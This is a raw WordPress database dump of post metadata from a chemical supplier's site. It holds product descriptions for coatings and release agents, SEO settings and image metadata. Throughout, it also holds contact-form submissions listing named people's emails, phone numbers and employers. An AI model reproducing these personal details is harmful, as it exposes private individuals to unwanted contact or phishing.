INSERT INTO `wp_postmeta` VALUES (23537, 2632, '_field_3', 'can you please quote myself 20 cans 14 oz of (6850-01-346-9144), of this product, including shipping being purchased with a government GSA card, thank you.'); 
INSERT INTO `wp_postmeta` VALUES (23538, 2632, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (23539, 2632, '_sub_id', '2632'); 
INSERT INTO `wp_postmeta` VALUES (23541, 620, '_wp_old_slug', 'ms-460h'); 
INSERT INTO `wp_postmeta` VALUES (23542, 620, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23543, 620, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23544, 620, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (23545, 620, '_yoast_wpseo_focuskw_text_input', 'Silicone Conformal Coatings'); 
INSERT INTO `wp_postmeta` VALUES (23546, 620, '_yoast_wpseo_focuskw', 'Silicone Conformal Coatings'); 
INSERT INTO `wp_postmeta` VALUES (23547, 620, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23548, 620, '_yoast_wpseo_focuskeywords', '[{"keyword":"MS-460H","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (23549, 1750, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23550, 620, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23551, 620, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23552, 620, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (23553, 620, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (23554, 620, '_ywtm_content_tab_description', 'Miller-Stephenson Silicone Conformal Coatings is a transparent, soft, flexible coating which offers excellent moisture resistance, good dielectric properties, and excellent light transmission capabilities for solar applications.  It has good weatherability and resistance to U.V. light and dirt pick-up.  This coating can be "solder-through" for easy repair. Contains Dow Corning 1-2577 silicone resin. This silicone resin meets the requirements of MIL-I-46058C, Type SR, IPC-CC-830B and  UL 746E approva. It is also compatible with WEEE and RoHS.\r\n<p class="content">Printed circuit boards (PCBs) form the foundation for electronics in automotive, consumer electronics, communications and industrial and energy applications. Yet these PCBs are often exposed to damaging environmental factors, ranging from moisture, dust and harsh chemicals to extreme thermal cycling and vibration.</p>\r\n<p class="content">Formulated from tough but flexible silicone technology, Miller-Stephenson Silicone Conformal Coatings promote extended service life and enhanced reliability for your PCB components and assemblies. Our industry-leading solutions have delivered proven protection for decades against moisture, service environment and a variety of harsh operating conditions includinga wide range of temperatures – from -45°C to 200°C</p>\r\n<p class="content">After cure, Miller-Stephenson\'s Silicone Conformal Coatings deliver dependable, long-lasting protection. Their natural elasticity also helps minimize mechanical or thermal stress on delicate component leads. Additional select grades deliver tougher, more abrasion resistant coatings ideally suited for electronic printed wiring board applications.</p>\r\n<p class="content"><a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a></p>\r\n<p class="content">More than a world-class materials supplier, Dow Corning is an expert and dedicated collaborator. If our product finder cannot identify an off-the-shelf solution that meets your precise specifications or if you are looking for application expertise and support please <a href="https://www.miller-stephenson.com/tech-support/">contact us</a>.</p>'); 
INSERT INTO `wp_postmeta` VALUES (23555, 620, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (23556, 2636, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23557, 2636, '_seq_num', '48'); 
INSERT INTO `wp_postmeta` VALUES (23558, 2636, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23559, 2636, '_field_12', 'Paul Dean'); 
INSERT INTO `wp_postmeta` VALUES (23560, 2636, '_field_13', 'L-3 Communications Aviation Products'); 
INSERT INTO `wp_postmeta` VALUES (23561, 2636, '_field_18', '72'); 
INSERT INTO `wp_postmeta` VALUES (23562, 2636, '_field_14', 'paul.dean@l-3com.com'); 
INSERT INTO `wp_postmeta` VALUES (23563, 2636, '_field_15', '(941) 371-0811'); 
INSERT INTO `wp_postmeta` VALUES (23564, 2636, '_field_16', 'I need a SDS for Dry Film RA/IPA-15, 1 gallon container.\nThank you'); 
INSERT INTO `wp_postmeta` VALUES (23565, 2636, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23566, 2636, '_sub_id', '2636'); 
INSERT INTO `wp_postmeta` VALUES (23567, 2637, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23568, 2637, '_seq_num', '49'); 
INSERT INTO `wp_postmeta` VALUES (23569, 2637, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23570, 2637, '_field_12', 'Isabelle Okuda'); 
INSERT INTO `wp_postmeta` VALUES (23571, 2637, '_field_13', 'Carbon3D'); 
INSERT INTO `wp_postmeta` VALUES (23572, 2637, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (23573, 2637, '_field_14', 'isabelle@carbon3d.com'); 
INSERT INTO `wp_postmeta` VALUES (23574, 2637, '_field_15', '(619) 200-5767'); 
INSERT INTO `wp_postmeta` VALUES (23575, 2637, '_field_16', 'Had two questions:\r\n1.  We find that Vertrel XM cleans polyurethane materials really well.   Do you use any filter material/adsorbants to prolong lifetime prior to distillation?\r\n2. We find that Vertrel XM does not clean epoxy based solid materials very well or causes cracking of our parts.  Do you recommend something to clean epoxy polymers?'); 
INSERT INTO `wp_postmeta` VALUES (23576, 2637, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23577, 2637, '_sub_id', '2637'); 
INSERT INTO `wp_postmeta` VALUES (23578, 732, '_wp_old_slug', 'ms-462h'); 
INSERT INTO `wp_postmeta` VALUES (23579, 732, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23580, 1751, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23581, 732, '_wp_old_slug', 'silicone-coating'); 
INSERT INTO `wp_postmeta` VALUES (23582, 732, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23583, 732, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23584, 732, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23585, 732, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (23586, 732, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (23587, 732, '_ywtm_content_tab_description', 'Miller-Stephenson Silicone Coatings is a transparent, soft, flexible MIL-SPEC coating which offers excellent moisture resistance, good dielectric properties, and excellent light transmission capabilities for solar applications.  It has good weatherability and resistance to U.V. light and dirt pick-up.  This coating can be "solder-through" for easy repair. Contains Dow Corning 1-2577 silicone resin. This silicone resin meets the requirements of MIL-I-46058C, Type SR, IPC-CC-830B and  UL 746E approval. It is also compatible with WEEE and RoHS.\r\n<p class="content">Printed circuit boards (PCBs) form the foundation for electronics in automotive, consumer electronics, communications and industrial and energy applications. Yet these PCBs are often exposed to damaging environmental factors, ranging from moisture, dust and harsh chemicals to extreme thermal cycling and vibration.</p>\r\n<p class="content">Formulated from tough but flexible silicone technology, Miller-Stephenson\'s Silicone Coating promote extended service life and enhanced reliability for your PCB components and assemblies. Our industry-leading solutions have delivered proven protection for decades against moisture, service environment and a variety of harsh operating conditions includinga wide range of temperatures – from -45°C to 200°C. An additional benefit of silicone conformal coating is its excellent moisture protection.  Silicones have been used in cases where there were extreme temperature differences, which resulted in excessive moisture.  Other conformal coatings failed within hours or days, while silicone, especially when applied thickly, has been proven to succeed.  One particular application was for electronically controlled heaters developed for artic temperatures.</p>\r\n<p class="content">After cure, Miller-Stephenson\'s Silicone Conformal Coatings deliver dependable, long-lasting protection. Their natural elasticity also helps minimize mechanical or thermal stress on delicate component leads. Additional select grades deliver tougher, more abrasion resistant coatings ideally suited for electronic printed wiring board applications.</p>\r\n<p class="content"><a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a></p>\r\n<p class="content">More than a world-class materials supplier, Miller-Stephenson is an expert and dedicated collaborator. If our product finder cannot identify an off-the-shelf solution that meets your precise specifications or if you are looking for application expertise and support please <a href="https://www.miller-stephenson.com/tech-support/">contact us</a>.</p>'); 
INSERT INTO `wp_postmeta` VALUES (23588, 732, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (23589, 732, '_yoast_wpseo_focuskw_text_input', 'Silicone Electronic Coating'); 
INSERT INTO `wp_postmeta` VALUES (23590, 732, '_yoast_wpseo_focuskw', 'Silicone Electronic Coating'); 
INSERT INTO `wp_postmeta` VALUES (23591, 732, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23592, 732, '_yoast_wpseo_focuskeywords', '[{"keyword":"MS-462H","score":"na"}]'); 
INSERT INTO `wp_postmeta` VALUES (23593, 732, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (23595, 1072, '_wp_old_slug', 'agl-683'); 
INSERT INTO `wp_postmeta` VALUES (23596, 1072, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23597, 1072, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23598, 1072, '_yoast_wpseo_linkdex', '30'); 
INSERT INTO `wp_postmeta` VALUES (23599, 1132, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23603, 469, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23604, 469, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (23605, 469, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (23606, 469, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (23607, 469, '_ywtm_content_tab_description', 'Miller-Stephenson\'s Fluoropolymer medical coatings are designed to optimize coating adhesion, durability, and corrosion resistance while minimizing coefficient of friction. Our world-class fluoropolymer chemistry delivers unmatched lubricity and adhesion on all medical guide wires.  In practice, medical personnel will feel smooth, low-friction movement as the guidewire progresses through the vasculature. Benefits Include:\r\n<ul>\r\n 	<li class="Body">High Durability, Flexibility and Corrosion resistance</li>\r\n 	<li class="Body">Unmatched Surface Adhesion</li>\r\n 	<li class="Body">Elimination of Delamination</li>\r\n 	<li class="Body">Stable to all forms of sterilization</li>\r\n 	<li class="Body">Passes all ISO and ASTM guidelines*</li>\r\n</ul>\r\n<p class="Body"><span class="C-8">Our Fluoropolymer medical coatings (PTFE-<wbr />coatings) are optimized to provide superior adhesion to stainless steel guidewires and other metal wire.  No other product on the market can match the adhesion characteristics and durability of our coating technology.  These formulations generate very uniform, thin films (5-<wbr />10 microns) which exceed all ISO and ASTM requirements.  <span class="C-14">Passes ASTM 1894 Coefficient of Friction; ASTM D3359 Adhesion Test; ISO 7802 Wire Wrap Test; ISO Corrosion Resistance Test</span></span></p>\r\n<p class="Body"><strong><span class="C-12">Usage Recommendations:</span></strong></p>\r\n<p class="Body"><span class="C-8">Miller-<wbr />Stephenson\'s Fluoropolymer coatings can be applied via spray or dip methods.  Proper post-<wbr />application curing equipment is critical to guarantee performance and durability. Acceptable curing equipment include high temperature ovens which can safely maintain temperatures of 400-<wbr />800 degree Fahrenheit or IR ovens.</span></p>\r\n<strong>Water-based One-Coat for Catheter Guide Wire</strong>\r\n\r\nNew next-generation catheter guidewire by Chemours™ provides excellent adhesion and corrosion protection on a variety of substrates (including stainless steel) while maintaining an extremely low co-efficient of friction (high lubricity).   Its lower hazardous classification and stability at ambient temperature may also help with handling, application pot-life, and storage conditions.\r\n\r\n<strong> </strong><strong>Performance and Facts –</strong>\r\n<ul>\r\n 	<li>No Cr(VI)</li>\r\n 	<li>Water-based</li>\r\n 	<li>One coat system</li>\r\n 	<li>Non-corrosive, non-flammable, low VOC</li>\r\n 	<li>One year shelf life stored at room temperature</li>\r\n 	<li>Comparable low coefficient of friction as PTFE- Cr(VI) based coating</li>\r\n 	<li>Dark Green or variety color as requested</li>\r\n 	<li>Coated smooth stainless steel panels passed Adhesion test , ASTM-3359</li>\r\n 	<li>Coated stainless steel catheter guidewires passed flexibility / adhesion tests, ISO11070 Annex F wrapping test</li>\r\n 	<li>Coated stainless steel catheter guidewires passed corrosion resistance, ISO11070 Annex B, saline soak test</li>\r\n 	<li>Positive feedback from customer evaluations</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (23608, 469, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (23609, 1554, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23612, 289, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23613, 308, '_wp_old_slug', 'ms-153bn'); 
INSERT INTO `wp_postmeta` VALUES (23614, 308, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23615, 308, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23616, 308, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (23617, 308, '_yoast_wpseo_focuskw_text_input', 'High Temperature Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (23618, 308, '_yoast_wpseo_focuskw', 'High Temperature Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (23619, 308, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23620, 308, '_yoast_wpseo_focuskeywords', '[{"keyword":"boron nitride","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (23621, 308, '_yoast_wpseo_linkdex', '96'); 
INSERT INTO `wp_postmeta` VALUES (23622, 204, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23623, 204, '_yoast_wpseo_focuskw_text_input', 'About Miller-Stephenson'); 
INSERT INTO `wp_postmeta` VALUES (23624, 204, '_yoast_wpseo_focuskw', 'About Miller-Stephenson'); 
INSERT INTO `wp_postmeta` VALUES (23625, 204, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23626, 204, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (23627, 204, '_yoast_wpseo_linkdex', '66'); 
INSERT INTO `wp_postmeta` VALUES (23629, 2649, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (23630, 2649, '_seq_num', '51'); 
INSERT INTO `wp_postmeta` VALUES (23631, 2649, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23632, 2649, '_field_1', 'Dongwon Lim'); 
INSERT INTO `wp_postmeta` VALUES (23633, 2649, '_field_10', 'Korea Aerospace University'); 
INSERT INTO `wp_postmeta` VALUES (23634, 2649, '_field_2', 'haedal@kau.ac.kr'); 
INSERT INTO `wp_postmeta` VALUES (23635, 2649, '_field_8', '(822) 300-0206'); 
INSERT INTO `wp_postmeta` VALUES (23636, 2649, '_field_3', 'To whom it may concern,\r\nHow are you ?\r\nThis is Korea Aerospace University(KAU) in South Korea.\r\nI am writing this email to ask for your assistance.\r\nMy questions are as follows:\r\n1. How long is the storage life or shelf life of MS-122AD ?\r\n2. The storage life of MS-122XD is the same period with MS-122AD ?\r\nThank you for your attention.\r\nBest regards.'); 
INSERT INTO `wp_postmeta` VALUES (23637, 2649, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (23638, 2649, '_sub_id', '2649'); 
INSERT INTO `wp_postmeta` VALUES (23639, 2650, '_wp_attached_file', '2016/08/shutterstock_278844821.jpg'); 
INSERT INTO `wp_postmeta` VALUES (23640, 2650, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3989;s:6:"height";i:2200;s:4:"file";s:34:"2016/08/shutterstock_278844821.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_278844821-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_278844821-800x441.jpg";s:5:"width";i:800;s:6:"height";i:441;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_278844821-768x424.jpg";s:5:"width";i:768;s:6:"height";i:424;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_278844821-1600x882.jpg";s:5:"width";i:1600;s:6:"height";i:882;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_278844821-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_278844821-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_278844821-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_278844821-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (23641, 2650, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (23642, 2651, '_wp_attached_file', '2016/08/shutterstock_314501645.jpg'); 
INSERT INTO `wp_postmeta` VALUES (23643, 2651, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:34:"2016/08/shutterstock_314501645.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_314501645-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_314501645-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_314501645-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_314501645-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_314501645-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_314501645-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_314501645-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_314501645-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (23644, 2651, '_wp_attachment_image_alt', 'ReleaSys 8800'); 
INSERT INTO `wp_postmeta` VALUES (23645, 2652, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23646, 2652, '_seq_num', '50'); 
INSERT INTO `wp_postmeta` VALUES (23647, 2652, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23648, 2652, '_field_12', 'Amanda Harderson'); 
INSERT INTO `wp_postmeta` VALUES (23649, 2652, '_field_13', 'Chemours'); 
INSERT INTO `wp_postmeta` VALUES (23650, 2652, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (23651, 2652, '_field_14', 'amanda.c.crafton@chemours.com'); 
INSERT INTO `wp_postmeta` VALUES (23652, 2652, '_field_15', '(901) 353-7501'); 
INSERT INTO `wp_postmeta` VALUES (23653, 2652, '_field_16', 'We use some of your products at our plant.  I&#039;m the Occupational Health Manager and a recent audit of chemicals in the shops indicated that we do not have a copy of an SDS for Freon TF high purity cleaning solvent.  Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (23654, 2652, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23655, 2652, '_sub_id', '2652'); 
INSERT INTO `wp_postmeta` VALUES (23656, 1152, '_yoast_wpseo_linkdex', '90'); 
INSERT INTO `wp_postmeta` VALUES (23657, 664, '_yoast_wpseo_linkdex', '38'); 
INSERT INTO `wp_postmeta` VALUES (23658, 1720, '_wp_attachment_image_alt', 'Quik-Freeze'); 
INSERT INTO `wp_postmeta` VALUES (23659, 1719, '_wp_old_slug', 'quik-freeze-ms-242n'); 
INSERT INTO `wp_postmeta` VALUES (23660, 1719, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (23661, 1719, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (23662, 1719, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (23663, 1719, '_yoast_wpseo_focuskw_text_input', 'Quik-Freeze'); 
INSERT INTO `wp_postmeta` VALUES (23664, 1719, '_yoast_wpseo_focuskw', 'Quik-Freeze'); 
INSERT INTO `wp_postmeta` VALUES (23665, 1719, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (23666, 1719, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (23667, 2654, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23668, 2654, '_seq_num', '51'); 
INSERT INTO `wp_postmeta` VALUES (23669, 2654, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23670, 2654, '_field_12', 'Lisa Dunne'); 
INSERT INTO `wp_postmeta` VALUES (23671, 2654, '_field_13', 'Cubic Transportation Systems'); 
INSERT INTO `wp_postmeta` VALUES (23672, 2654, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (23673, 2654, '_field_14', 'lisa.dunne@cubic.com'); 
INSERT INTO `wp_postmeta` VALUES (23674, 2654, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (23675, 2654, '_field_16', 'we recently purchased MS-262.150 Safezone Cleaner from JEA Technologies in Australia.  Please could you send me the safety data sheet for our health and safety records '); 
INSERT INTO `wp_postmeta` VALUES (23676, 2654, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23677, 2654, '_sub_id', '2654'); 
INSERT INTO `wp_postmeta` VALUES (23678, 2655, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23679, 2655, '_seq_num', '52'); 
INSERT INTO `wp_postmeta` VALUES (23680, 2655, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23681, 2655, '_field_12', 'FASGT Paul Wendt'); 
INSERT INTO `wp_postmeta` VALUES (23682, 2655, '_field_13', 'Royal Australian Airforce'); 
INSERT INTO `wp_postmeta` VALUES (23683, 2655, '_field_18', 'NA'); 
INSERT INTO `wp_postmeta` VALUES (23684, 2655, '_field_14', 'paul.wendt@defence.gov.au'); 
INSERT INTO `wp_postmeta` VALUES (23685, 2655, '_field_15', '(075) 461-9433'); 
INSERT INTO `wp_postmeta` VALUES (23686, 2655, '_field_16', 'Hi,\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (23687, 2655, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23688, 2655, '_sub_id', '2655'); 
INSERT INTO `wp_postmeta` VALUES (23689, 2656, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23690, 2656, '_seq_num', '53'); 
INSERT INTO `wp_postmeta` VALUES (23691, 2656, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23692, 2656, '_field_12', 'FSGT Paul Wendt'); 
INSERT INTO `wp_postmeta` VALUES (23693, 2656, '_field_13', 'Royal Australian Airforce'); 
INSERT INTO `wp_postmeta` VALUES (23694, 2656, '_field_18', 'NA'); 
INSERT INTO `wp_postmeta` VALUES (23695, 2656, '_field_14', 'paul.wendt@defence.gov.au'); 
INSERT INTO `wp_postmeta` VALUES (23696, 2656, '_field_15', '(075) 461-9433'); 
INSERT INTO `wp_postmeta` VALUES (23697, 2656, '_field_16', 'Hi,\r\nI am looking for an Australian supplier of MS  122AD soI acn get an Australian Standard SDS. Our current version has expired.\r\n\r\nRegards\r\n\r\nPaul'); 
INSERT INTO `wp_postmeta` VALUES (23698, 2656, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23699, 2656, '_sub_id', '2656'); 
INSERT INTO `wp_postmeta` VALUES (23700, 2657, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23701, 2657, '_seq_num', '54'); 
INSERT INTO `wp_postmeta` VALUES (23702, 2657, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23703, 2657, '_field_12', 'Jovanka Zec'); 
INSERT INTO `wp_postmeta` VALUES (23704, 2657, '_field_13', 'Datalent'); 
INSERT INTO `wp_postmeta` VALUES (23705, 2657, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (23706, 2657, '_field_14', 'jzec@datalent.com'); 
INSERT INTO `wp_postmeta` VALUES (23707, 2657, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (23708, 2657, '_field_16', 'Hello, can you send me SDS file for product EPOXY 907 PART A &amp; PART B?\r\nThank you, \r\nJovanka Zec'); 
INSERT INTO `wp_postmeta` VALUES (23709, 2657, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23710, 2657, '_sub_id', '2657'); 
INSERT INTO `wp_postmeta` VALUES (23711, 2658, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (23712, 2658, '_seq_num', '55'); 
INSERT INTO `wp_postmeta` VALUES (23713, 2658, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23714, 2658, '_field_12', 'Donnie Holmquist'); 
INSERT INTO `wp_postmeta` VALUES (23715, 2658, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (23716, 2658, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (23717, 2658, '_field_14', 'Donnie.Holmquist@ethosenergygroup.com'); 
INSERT INTO `wp_postmeta` VALUES (23718, 2658, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (23719, 2658, '_field_16', 'I was needing a updated version of the SDS for MS-907 Two-Part Epoxy Adhesive'); 
INSERT INTO `wp_postmeta` VALUES (23720, 2658, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (23721, 2658, '_sub_id', '2658'); 
INSERT INTO `wp_postmeta` VALUES (23722, 2659, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (23723, 2659, '_seq_num', '52'); 
INSERT INTO `wp_postmeta` VALUES (23724, 2659, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23725, 2659, '_field_1', 'Leah Farren'); 
INSERT INTO `wp_postmeta` VALUES (23726, 2659, '_field_10', 'Paramount Machine Co.'); 
INSERT INTO `wp_postmeta` VALUES (23727, 2659, '_field_2', 'lfarren@paramountmachineco.com'); 
INSERT INTO `wp_postmeta` VALUES (23728, 2659, '_field_8', '(860) 646-4504'); 
INSERT INTO `wp_postmeta` VALUES (23729, 2659, '_field_3', 'I&#039;d like to place an order for 1 quart of MS-143TE Mold Release Agent and 1 quart of MS-782 Vertrel XF Cleaning agent'); 
INSERT INTO `wp_postmeta` VALUES (23730, 2659, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (23731, 2659, '_sub_id', '2659'); 
INSERT INTO `wp_postmeta` VALUES (23732, 2660, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (23733, 2660, '_seq_num', '53'); 
INSERT INTO `wp_postmeta` VALUES (23734, 2660, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (23735, 2660, '_field_1', 'Sandra Russo'); 
INSERT INTO `wp_postmeta` VALUES (23736, 2660, '_field_10', 'United Launch Alliance'); 
INSERT INTO `wp_postmeta` VALUES (23737, 2660, '_field_2', 'sandra.e.russo@ulalaunch.com'); 
INSERT INTO `wp_postmeta` VALUES (23738, 2660, '_field_8', '(321) 730-0521'); 
INSERT INTO `wp_postmeta` VALUES (23739, 2660, '_field_3', 'May I please have a Safety Data Sheet for MS-143V-10?'); 
INSERT INTO `wp_postmeta` VALUES (23740, 2660, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (23741, 2660, '_sub_id', '2660'); 
